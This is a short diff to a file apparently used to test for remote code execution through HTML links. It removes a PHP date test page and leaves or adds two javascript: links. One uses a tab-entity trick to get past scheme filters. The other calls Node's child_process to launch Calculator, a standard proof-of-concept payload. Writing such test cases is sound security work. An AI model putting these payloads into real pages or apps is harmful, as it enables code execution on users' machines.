--- a/test_rc.html
+++ b/test_rc.html
@@ -1,12 +1,5 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>PHP Test</title>
-</head>
-<body>
-  <h1>PHP Execution Test</h1>
-  <p>Today's date is: <?php echo date("Y-m-d H:i:s"); ?></p>
-</body>
-</html>
+
 
 <a href="java&Tab;script:alert(JSON.stringify(Object.keys(window)))">Click Me</a>
+
+<a href="javascript:require('child_process').exec('open -a Calculator')">Click me</a>
